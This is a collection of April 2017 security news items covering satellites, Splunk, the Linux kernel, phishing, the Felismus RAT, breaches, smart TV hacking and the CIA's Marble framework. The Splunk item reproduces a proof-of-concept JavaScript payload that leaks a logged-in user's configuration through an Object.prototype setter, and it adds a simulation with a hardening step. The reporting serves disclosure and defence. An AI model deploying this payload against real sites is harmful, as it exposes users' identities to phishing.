Governments consider realistic the threat of a cyber attack launched by a nation-state actor, a criminal organisation or even a lone hacker. The principal concerns relate to operations by Chinese hackers, likely state-sponsored, who in the past have already breached the security of US satellites.

In August, the Chinese government launched the world’s first quantum satellite, which will help it establish “hack-proof” communications between space and the ground.

Alleged state-sponsored hackers interfered with the operations of two U.S. government satellites in 2007 and 2008, obtaining access through a ground station in Norway. The satellites were used for climate monitoring.

The hackers “achieved all steps required to command” the Terra AM-1 satellite, but did not actually control it. An attacker with command privileges could “deny or degrade as well as forge or otherwise manipulate the satellite’s transmission,” or simply damage or destroy the satellite.

The Japanese government's plan is to install a code generator on satellites so that they can dynamically encrypt data.

“The dynamic codes will be sent to the ground base station using light beams. As the encryption is dynamic, it is more difficult for hackers to decode data even if they are able to intercept transmissions.” continues the Watertown Daily Times.

The code generator is a small cube (approximately 10 centimeters on each side) that could easily be installed on a micro-satellite being developed by a start-up firm, which is approximately 30-40 centimeters on each side.


Microsoft is Shutting Down CodePlex, Asks Devs To Move To GitHub
3.4.2017 thehackernews IT
Microsoft has announced that it will shut down CodePlex, its website for hosting repositories of open-source software projects, on December 15, 2017.
Launched in 2006, CodePlex was one of Microsoft's biggest steps towards the open source community, where any programmer, anywhere, can share the code for their software or download and tweak someone else's code.
However, Microsoft says that usage of the service has fallen dramatically, with fewer than 350 projects having seen a source code commit in the last 30 days, and points to GitHub as the "de-facto place for open source sharing."
GitHub – 'Facebook for Programmers'
In a blog post published Friday, Microsoft Corporate VP Brian Harry wrote that CodePlex is being shut down because the open source community has almost entirely moved to GitHub, which provides similar functionality for sharing code that people can collaborate on.
"Over the years, we have seen a lot of amazing options come and go but at this point, GitHub is the de-facto place for open source sharing, and most open source projects have migrated there," says Harry.
According to the company, Github has become the "Facebook for programmers," so "it's time to say goodbye to CodePlex."
For now, Microsoft has disabled the ability to create new projects on CodePlex, and in October the site will be turned into a read-only archive.
The complete shutdown comes on December 15 this year, at which point the CodePlex website will be archived indefinitely.
"You will also be able to download an archive file with your project contents, all in common, transferable formats like Markdown and JSON," Harry writes.
"Where possible, we will put in place redirects so that existing URLs work, or at least redirect you to the project's new homepage on the archive. And, the archive will respect your "I've moved" setting, if you used it, to direct users to the current home of your project."
Migrate your Code and Related Projects to GitHub
Harry also points out that many of Microsoft's own open source projects have already moved to GitHub, and the company is actively recommending that others do the same.
The company is itself using GitHub to host open-source software projects such as PowerShell, .NET and its Chakra JavaScript engine.
Microsoft is making the migration easier for its users: it has teamed up with GitHub to create a "streamlined" migration tool to help developers move their code and related content over to GitHub.
Since a release date of the migration tool is not yet known, users can check out the guide on CodePlex for any help with migrating to GitHub.


No Prizes Awarded in Google's Android Hacking Contest

3.4.2017 thehackernews Android

Google reported last week that its Project Zero Prize contest was not as successful as the company hoped it would be – no valid Android exploits were submitted and no prizes were awarded.

In September, Google announced the start of a six-month Android hacking contest that invited researchers to submit serious vulnerabilities and exploit chains. The first winning entry was offered $200,000, and the second would have received $100,000. Other entries were promised at least $50,000.

While some research teams and individuals informed the company of their intention to take part in the contest, ultimately, no one submitted any valid bugs, said Google Project Zero’s Natalie Silvanovich. Some vulnerability reports were submitted, but they were not eligible for a reward under the rules of the Project Zero Prize.

Google believes three main factors led to the lack of entries. One of them was the level of difficulty – hackers were required to find a full exploit chain that allowed remote code execution on up-to-date Nexus 6P and Nexus 5X devices by knowing only their email address and phone number. The targeted user could only open an email in Gmail or an SMS in Messenger.

Project Zero Prize participants were encouraged to submit partial exploits during the contest as the rules only allowed the first submitter to use a certain vulnerability during the contest.

“We expected these rules to encourage participants to file any bugs they found immediately, as only the first finder could use a specific bug, and multiple reports of the same Android bug are fairly common,” Silvanovich explained. “Instead, some participants chose to save their bugs for other contests that had lower prize amounts but allowed user interaction, and accept the risk that someone else might report them in the meantime.”

The tech giant also believes the prizes offered in the contest may have been too small for the types of vulnerabilities that were required. For example, zero-day acquisition firm Zerodium also offers up to $200,000 for Android rooting exploits and they can fetch much more on the black market.

While this contest was not a success, researchers do find plenty of vulnerabilities in Android. Google revealed recently that it paid out roughly $1 million for Android flaws reported last year through its vulnerability reward program.


Attackers can siphon data from Splunk Enterprise if an authenticated user visits a malicious webpage
3.4.2017 thehackernews Vulnerability

Splunk has fixed a security issue in the JavaScript implementation of Splunk Enterprise, tracked as CVE-2017-5607, that can be exploited to siphon data.
Splunk has fixed a security issue in its JavaScript implementation, tracked as CVE-2017-5607, that leaks user information. Splunk provides the leading platform for Operational Intelligence, used to search, monitor, analyze and visualize machine data; Splunk Enterprise collects and analyzes high volumes of machine-generated data.


The security issue could be exploited by an attacker tricking an authenticated user into visiting a malicious Web page. The bug leaks the username, and whether that user has enabled remote access, allowing an attacker to target the user with a spear phishing attack to steal the user’s credentials.

“Attackers can siphon information from Splunk Enterprise if an authenticated Splunk user visits a malicious webpage. Some useful data gained is the currently logged in username and if remote user setting is enabled.” reads the advisory published at Full Disclosure. “After, the username can be used to Phish or Brute Force Splunk Enterprise login. Additional information stolen may aid in furthering attacks.

Root cause is the global Window JS variable assignment of config?autoload=1 ‘$C’.”

The problem lies in the way Splunk hands its configuration object to a global variable. In JavaScript, every ordinary object, including the global window object, inherits from Object.prototype, so a setter defined there for the ‘$C’ property is invoked when the Splunk page assigns its configuration to that global.

“To steal information we simply can define a function to be called when the ‘$C’ JS property is “set” on webpage, for example. Object.defineProperty( Object.prototype, "$C", { set:function(val){…” continues the advisory.

Below is the proof-of-concept JavaScript code published in the advisory:

<script>
// Plant a setter for "$C" on Object.prototype: it runs when the Splunk page
// assigns its configuration object to the global $C variable.
Object.defineProperty( Object.prototype, "$C", { set:function(val){
    // prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername: "+val.USERNAME, "Password")
    // Dump every field of the configuration object, including USERNAME.
    for(var i in val){
        alert(""+i+" "+val[i]);
    }
  }
});
</script>
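To make the mechanism concrete, the following is an added JavaScript example (not code from the advisory, from Splunk, or from the original article) that simulates both sides: a page script that delivers its configuration by plain assignment to a global, and a hostile page's setter planted on Object.prototype. A plain object stands in for window (both inherit from Object.prototype), and the configuration fields USERNAME and REMOTE_USER_ENABLED are constructed values. It also shows one hardening step, creating $C as an own, non-writable property, which an inherited setter never sees.

```javascript
// Added example: why an inherited setter on Object.prototype can observe a
// configuration object that a page assigns to a global variable.
// A plain object (whose prototype is Object.prototype, like window) stands in
// for the global object. All field values are constructed for the example.

// The pattern named as the root cause: the config is delivered by assigning it
// to a global. Assignment goes through [[Set]]; with no own property named "$C"
// on the target, the lookup reaches Object.prototype and runs any setter there.
function serveConfigByGlobalAssignment(globalObj, config) {
  globalObj.$C = config;
}

// Hardened variant: define $C as an own data property of the global object.
// Object.defineProperty creates the property directly on the target, so a
// setter inherited from Object.prototype is never consulted, and the frozen,
// non-writable value cannot be swapped out later by other scripts on the page.
function serveConfigAsOwnProperty(globalObj, config) {
  Object.defineProperty(globalObj, '$C', {
    value: Object.freeze(config),
    writable: false,
    configurable: false,
    enumerable: false,
  });
}

// Stand-in for the hostile page: plant a "$C" setter on Object.prototype, let
// the page's script run, and report what (if anything) the setter observed.
function runWithPlantedSetter(serve) {
  const captured = [];
  const globalObj = {}; // stands in for window; a fresh object per run
  Object.defineProperty(Object.prototype, '$C', {
    configurable: true,
    set(val) { captured.push(val); },
  });
  try {
    // Constructed configuration fields, modelled on the advisory's description.
    serve(globalObj, { USERNAME: 'constructed-user', REMOTE_USER_ENABLED: false });
  } finally {
    delete Object.prototype.$C; // always remove the planted setter
  }
  return {
    leaked: captured.length > 0,
    leakedUsername: captured.length > 0 ? captured[0].USERNAME : null,
    ownProperty: Object.getOwnPropertyDescriptor(globalObj, '$C') !== undefined,
  };
}

// Stand-alone usage: compare the two delivery patterns.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('global assignment:', runWithPlantedSetter(serveConfigByGlobalAssignment));
  console.log('own property     :', runWithPlantedSetter(serveConfigAsOwnProperty));
}
```

The own-property definition only closes this particular observation channel. The stronger, general mitigation, which the example does not show, is to stop serving authenticated user data in a script resource that any origin can load, and to deliver it instead through a same-origin JSON endpoint that cannot be included via a script tag.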

Affected Splunk Enterprise versions are:

6.5.x before 6.5.3
6.4.x before 6.4.6
6.3.x before 6.3.10
6.2.x before 6.2.13.1
6.1.x before 6.1.13
6.0.x before 6.0.14
5.0.x before 5.0.18 and Splunk Light before 6.5.2


Linux Kernel vulnerability CVE-2017-7184 disclosed at Pwn2Own 2017 fixed
3.4.2017 securityaffairs Vulnerability

The Linux kernel flaw exploited by the hackers at the Zero Day Initiative’s Pwn2Own 2017 competition to hack Ubuntu has been patched.
The Chaitin Security Research Lab (@ChaitinTech) discovered a Linux kernel flaw, tracked as CVE-2017-7184, during the last Pwn2Own 2017 competition. The experts hacked Ubuntu Desktop by exploiting a Linux kernel heap out-of-bounds access and earned $15,000 and 3 Master of Pwn points. It was the first Ubuntu Linux hack at Pwn2Own.

“This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of the Linux Kernel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.” reads the ZDI advisory.

“The specific flaw exists within the handling of xfrm states. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to elevate privileges and execute arbitrary code under the context of the kernel.”


The vulnerability can be exploited by a local attacker to cause a denial-of-service (DoS) condition or to execute arbitrary code and escalate privileges on the system.

Red Hat rated the flaw as “high severity,” although its experts confirmed that the flaw cannot be exploited for privilege escalation on default or common configurations of Red Hat Enterprise Linux 5, 6 and 7.

The CVE-2017-7184 flaw was fixed in the Linux kernel a few days after the Pwn2Own 2017 competition, and the Ubuntu development team fixed it at the end of March. Other Linux distributions are working on security patches.


Phishing campaigns target airline consumers seeking business credentials
3.4.2017 securityaffairs Phishing

A series of phishing campaigns is targeting airline consumers with messages crafted to trick victims into handing over personal or business credentials.
A string of phishing campaigns is targeting airline consumers with messages crafted to trick victims into handing over personal or business credentials.

The phishing messages pretend to be sent from a travel agency or from someone inside the target firm; they include a weaponized document or embed a malicious link.

“Over the past several weeks, we have seen a combination of attack techniques. One, where an attacker impersonates a travel agency or someone inside a company. Recipients are told an email contains an airline ticket or e-ticket,” explained Asaf Cidon, vice president, content security services at Barracuda Networks.


According to Barracuda Networks, aviation-themed phishing attacks contain links to spoofed airline sites, and threat actors personalize the phishing page to trick victims into providing business information.

The attackers show a deep knowledge of their targets; they are hitting the logistics, manufacturing and shipping industries.

“It’s clear there is some degree of advanced reconnaissance that takes place before targeting individuals within these companies,” Cidon added.

Recently the U.S. Computer Emergency Readiness Team issued an alert of phishing campaigns targeting airline consumers.

“US-CERT has received reports of email-based phishing campaigns targeting airline consumers. Systems infected through phishing campaigns act as an entry point for attackers to gain access to sensitive business or personal information.” reads the US-CERT warning.

“US-CERT encourages users and administrators to review an airline Security Advisory and US-CERT’s Security Tip ST04-014 for more information on phishing attacks.”

The US-CERT specifically references the security advisory published by Delta Air Lines that warned its consumers of fraudulent activities.

“Delta has received reports of attempts by parties not affiliated with us to fraudulently gather customer information in a number of ways including: fraudulent emails, social media sites, postcards, Gift Card promotional websites claiming to be from Delta Air Lines and letters or prize notifications promising free travel,” states the Delta Air Lines warning.

Barracuda confirmed that these campaigns have a high success rate:

“Our analysis shows that for the airline phishing attack, attackers are successful over 90 percent of the time in getting employees to open airline impersonation emails,” concluded Cidon. “This is one of the highest success rates for phishing attacks.”


Forcepoint spotted the modular Felismus RAT, it appears the work of skilled professionals
2.4.2017 securityaffairs Virus

Malware researchers at Forcepoint have discovered a new modular malicious code, dubbed Felismus RAT, that appears the work of skilled professionals.
Malware researchers at Forcepoint have discovered a new modular malicious code dubbed Felismus RAT. The malware has been used in highly targeted campaigns, and the experts believe it is the work of skilled professionals.

The malware implements sophisticated evasion techniques and anti-analysis features, including advanced encryption of its network communications: it uses at least three separate encryption methods depending on the type of message. Forcepoint experts also noticed the threat actor's good ‘operational hygiene’, such as avoiding the reuse of email addresses and other traceable artifacts across its campaigns.

The Felismus RAT implements a self-updating capability, it is currently able to evade a large number of antivirus solutions. The malicious code implements the typical features of RATs, such as file upload, file download, file execution, and shell (cmd.exe) command execution.

The malicious code can also create text files on the infected machine.

The researchers started their investigation of the Felismus RAT from available samples whose filenames mimic that of Adobe’s Content Management System (AdobeCMS.exe). These samples were detected several weeks ago, but the cyber attacks leveraging this malware date back six months earlier.

“The primary samples examined appear in the wild with filenames mimicking that of Adobe’s Content Management System [1] and offers a range of commands typical of Remote Access Tools: file upload, file download, file execution, and command execution.” reads the analysis published by Forcepoint. “Analysis shows the malware overall to be modular, well-written, and to go to great lengths to hinder both analysis efforts and the content of its communications. Its apparent scarcity in the wild implies that it is likely highly targeted. Furthermore, as discussed in this analysis, the good ‘operational hygiene’ relating to the re-use of email addresses and other similarly traceable artefacts similarly suggests the work of coordinated professionals.”

The experts are still investigating the attacks leveraging the RAT that is believed to be part of a larger campaign.

The command and control (C&C) infrastructure appears still active.

“Visiting cosecman[]com reveals what appears to be a copy of the WordPress.org website, albeit with a stylesheet error in all browsers tested.” continues the analysis.


The researchers noticed the threat actors did not reuse the email addresses to register the domains involved in their campaigns.

“The malware analysed appears to be both modular and well-written, strongly suggesting that skilled attackers are responsible, while its apparent scarcity in the wild implies that it is likely highly targeted.” concluded the analysis. “On top of this, the good ‘operational hygiene’ relating to the re-use of email addresses and other similarly traceable artefacts suggests coordinated, professional actors and, at the time of writing, there is little to link it with any known campaigns (APT-linked or otherwise).”

Some typos in the folder name and in the function name ‘GetCurrtenUserName’ suggest that the authors might not be native English speakers.

The researchers discovered that the available malware samples appear to have been compiled using a December 2014 version of the open-source TDM-GCC compiler suite.

The researchers added that one of the C&C IP addresses appeared to selectively block one of the security firm’s exit IPs during research.

“If the other modules and capabilities associated with the malware remain a matter of speculation, so too do the intended target(s). Of the five domains hosted on the C&C IP address identified within this post, three – cosecman[]com, nasomember[]com, and unmailhome[]com – have potential associations with the financial services sector; however, under this theory the naming of the remaining two domains – maibars[]com and mastalib[]com – remain unexplained,” Forcepoint concludes.


95,000 job seekers affected by the McDonald’s Canada data breach
2.4.2017 securityaffairs Crime

The McDonald’s Canada career website was recently subject to a cyber-attack. Hackers stole records of 95,000 job seekers.
McDonald’s Canada confirmed that hackers have stolen the personal data of about 95,000 job seekers from its recruitment website.

The data were provided by candidates searching for a job at McDonald’s Canada since March 2014. The company has launched an investigation into the data breach that exposed job candidates’ names, addresses, emails, telephone numbers, employment histories and other personal data.

“The McDonald’s Canada (“McDonald’s”) career website (http://www.mcdonalds.ca/ca/en/careers.html or http://www.mcdonalds.ca/ca/fr/careers.html) was recently subject to a cyber-attack.” reads the data breach notification published by the company.

“As a result, the personal information of approximately 95,000 restaurant job applicants has been compromised. Applicants affected are those who applied online for a job at a McDonald’s Canada restaurant between March 2014 and March 2017. “


McDonald’s Canada has shut down the recruitment website; fortunately, the company does not request sensitive data such as health information, social insurance numbers and financial information through it.

The company confirmed that it is not aware of any abuse of the stolen data.

“The careers webpage will remain shut down until the investigation is complete and appropriate measures are taken to ensure that this type of security breach does not happen again,” continues the breach notification.


Over 85% Of Smart TVs Can Be Hacked Remotely Using Broadcasting Signals
2.4.2017 thehackernews IoT

The Internet-connected devices are growing at an exponential rate, and so are threats to them.
Due to insecure implementations, a majority of Internet-connected embedded devices, including smart TVs, refrigerators, microwaves, security cameras and printers, are routinely being hacked and used as weapons in cyber attacks.
We have seen IoT botnets like Mirai – possibly the biggest IoT-based malware threat that emerged late last year and caused vast internet outage by launching massive DDoS attacks against DynDNS provider – which proves how easy it is to hack these connected devices.
Now, a security researcher is warning of another IoT threat involving Smart TVs that could allow hackers to take complete control of a wide range of Smart TVs at once without having any physical access to any of them.
Researcher Shows Live Hacking Demonstration

The proof-of-concept exploit for the attack, developed by Rafael Scheel of cyber security firm Oneconsult, uses a low-cost transmitter to embed malicious commands into rogue DVB-T (Digital Video Broadcasting — Terrestrial) signals.
Those rogue signals are then broadcast to nearby devices, allowing attackers to gain root access on the smart TVs and use those devices for nasty actions, such as launching DDoS attacks and spying on end users.
Scheel provided a live hacking demonstration of the attack during a presentation at the European Broadcasting Union (EBU) Media Cyber Security Seminar, saying about 90 percent of the Smart TVs sold in the last years are potential victims of similar attacks.
Scheel's exploit relies on a transmitter based on DVB-T — a transmission standard that's built into TVs that are connected to the Internet.
The attack exploits two known privilege escalation vulnerabilities in the web browsers running in the background; once the TV is compromised, attackers could remotely connect to it over the Internet, allowing them to take complete control of the device.
Once compromised, the TV is infected in a way that neither device reboots nor factory resets help the victim get rid of the infection.

Scheel's exploit is unique and much more dangerous than any smart TV hack we have seen so far.
Previous Smart TV hacks, including Weeping Angel (described in the CIA leaked documents), required physical access to the targeted device or relied on social engineering, which exposes hackers to the risk of being caught as well as limits the number of devices that can be hacked.
However, Scheel's exploit eliminates the need for hackers to gain physical control of the device and can work against a vast majority of TV sets at once.
The hack once again underlines the risks of "Internet of Things" devices. Since the IoT devices are rapidly growing and changing the way we use technology, it drastically expands the attack surface, and when viewed from the vantage point of information security, IoT can be frightening.


German Military to Launch the Bundeswehr’s new Cyber and Information Space Command
2.4.2017 securityaffairs  BigBrothers

Today the German Military is going to launch a cyber command, the Bundeswehr’s new Cyber and Information Space (CIR) Command.
Today the German Military launches a cyber command, the Bundeswehr’s new Cyber and Information Space (CIR) Command, a structure considered strategic for defending the country against cyber attacks.

According to the new commander, Lieutenant General Ludwig Leinhos, Germany is taking a leading role among the members of the NATO alliance.

“Leinhos said the main tasks would be to operate and protect the military’s own IT infrastructure and computer-assisted weapons systems, as well as surveillance of online threats.” reported the Reuters agency.

The German Government intends to protect its critical infrastructure and its assets from cyber attacks. The German military fears cyber espionage and sabotage.

The Bundeswehr’s new Cyber and Information Space (CIR) Command, will be composed of 260 IT specialists, but the Government plans to increase its staff up to 13,500 military and civilian personnel by July.

General Ludwig Leinhos confirmed that the centre will also be tasked with developing offensive cyber capabilities.

“He said the centre would also develop and war-game offensive capabilities because “in order to be able to defend yourself, you have to know the options for attack”.” continues the Reuters report.

Operations conducted by the Cyber and Information Space (CIR) Command will have to be approved by the German Parliament, which means that cyber operations are treated as equal to conventional military missions.

The creation of the centre is the response to the numerous attacks suffered by the German Government, last year the Bundestag was hit by numerous attacks.


In June, German media reported that the Bundestag may need to replace 20,000 computers after hackers breached its systems.

According to Der Spiegel magazine, security experts involved in the investigation of the attack against the Bundestag suspect that the hack was part of a large-scale espionage campaign conducted by Russian state-sponsored hackers.

The German defense ministry said that in the first nine weeks of 2017, the IT systems of the Bundeswehr had been hit by more than 280,000 attacks.

“We are in a constant race between the development of attack options and defensive capabilities,” concluded Leinhos.


WikiLeaks Reveals the Marble framework, used by the CIA to hamper attribution
2.4.2017 securityaffairs BigBrothers

WikiLeaks has published the third batch of Vault7 documents, dubbed Marble, which reveals the CIA anti-forensics tool known as the Marble Framework.
WikiLeaks released the third batch of the CIA Vault7 archive, shedding light on the anti-forensics tools used by the intelligence agency.

The first tranche of CIA documents from Vault7 was related to hacking tools and techniques, while the second batch included detailed info about hacking tools specifically designed to hack SmartTV, Android handhelds, Apple iPhones, Macs and Windows systems.

This third lot of documents, dubbed Marble, contains 676 source code files of the secret anti-forensic Marble Framework.

The CIA developed the Marble Framework to hinder forensic analysis of its malicious code.

The code used by the CIA was able to evade detection using various techniques; for example, it is able to detect whether it is running in a virtual machine sandbox.

The Marble platform hampers attribution of the attacks: the documents show how the CIA can conduct a cyber attack in a way that leads experts to attribute it to other countries, including Russia, China, North Korea and Iran.

“Today, March 31st 2017, WikiLeaks releases Vault 7 “Marble” — 676 source code files for the CIA’s secret anti-forensic Marble Framework. Marble is used to hamper forensic investigators and anti-virus companies from attributing viruses, trojans and hacking attacks to the CIA.” reads Wikileaks.

“Marble does this by hiding (“obfuscating”) text fragments used in CIA malware from visual inspection. This is the digital equivalent of a specialized CIA tool to place covers over the English language text on U.S. produced weapons systems before giving them to insurgents secretly backed by the CIA.”


The CIA Marble Framework includes algorithms that insert multiple strings in various languages into the malware source code to hamper attribution. Using such techniques, malware authors try to trick victims into believing that the malware was developed by American/English VXers.

“The source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi.” continues Wikileaks. “This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, but there are other possibilities, such as hiding fake error messages.”

Marble Framework does not contain any vulnerabilities or exploits.

The Marble dump also includes a deobfuscator to reverse the CIA text obfuscation; using it, experts can identify patterns in attacks conducted by the CIA and attribute previous hacking attacks and malicious code to the agency. Marble was in use at the CIA during 2016; in 2015 the cyber spies were using version 1.0.


Threat Landscape for Industrial Automation Systems, H2 2016
1.4.2017 Kaspersky ICS

The Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) is starting a series of regular publications about our research devoted to the threat landscape for industrial organizations.

All statistical data used in the report was obtained using Kaspersky Security Network (KSN), a distributed antivirus network. Data was received from those KSN users who consented to have their data collected anonymously.

The research carried out in the second half of 2016 by Kaspersky Lab ICS CERT experts clearly demonstrates a number of trends in the evolution of industrial enterprise security.

On average, in the second half of 2016 Kaspersky Lab products across the globe blocked attempted attacks on 39.2% of protected computers that Kaspersky Lab ICS CERT classifies as being part of industrial enterprise technology infrastructure.

This group includes computers that run Windows and perform one or more of the following functions:

Supervisory Control and Data Acquisition (SCADA) servers,
Data storage servers (Historian),
Data gateways (OPC),
Stationary engineer and operator workstations,
Mobile engineer and operator workstations,
Human Machine Interface (HMI).
The group also includes computers of external third-party contractors, SCADA vendors and system integrators, as well as internal SCADA administrators.

Every month, an average of one industrial computer in five (20.1%) is attacked by malware. We have seen stable growth in the percentage of industrial computers attacked since the beginning of our observations, highlighting the importance of cybersecurity issues.


Percentage of industrial computers attacked by month (second half of 2016)

Isolation of industrial networks can no longer be considered an effective protective measure. The proportion of malware infection attempts involving portable media, infection of backup copies, use of sophisticated schemes for transferring data from isolated networks in complex attacks – all of this demonstrates that risks cannot be avoided by simply disconnecting a system from the Internet.

Sources of threats blocked on industrial computers (second half of 2016)

Remarkably, there is very little difference between the rankings of malware detected on industrial computers and those of malware detected on corporate computers. We believe that this demonstrates the absence of significant differences between computers on corporate networks and those on industrial networks in terms of the risk of chance infections. However, it is obvious that even a chance infection on an industrial network can lead to dangerous consequences.

Distribution of industrial computers attacked by classes of malware used in attacks (second half of 2016)

According to our data, targeted attacks on companies in different industrial sectors are increasingly common. These are organized attacks that can target one enterprise, several enterprises, companies in one industrial sector or a broad range of industrial enterprises.

The Kaspersky Lab ICS CERT detected a series of phishing attacks which began no later than June 2016 and which are still active. The attacks target primarily industrial companies – metallurgical, electric power, construction, engineering and others. We estimate the number of companies attacked at over 500 in more than 50 countries around the world.

None of the malicious programs used in the attack – trojan spies and backdoors from different families, such as ZeuS, Pony/FareIT, Luminosity RAT, NetWire RAT, HawkEye, and ISR Stealer – are unique to this malicious campaign. They are all very popular among cybercriminals. However, these programs are packed with unique modifications of VB and MSIL packers that are used only in this attack. Our experience of investigating targeted attacks shows that cyberespionage is often used to prepare subsequent attack stages.

One quarter of all targeted attacks uncovered by Kaspersky Lab in 2016 targeted, among other sectors, various industries: machine building, energy, chemical, transport and others.

In 2016, Kaspersky Lab evaluated the current state of IT security components in the industrial control systems of different vendors. As a result of this research, 75 vulnerabilities were identified in ICS components; 58 of them were rated as highly critical (CVSS v3.0 severity score 7.0 or higher).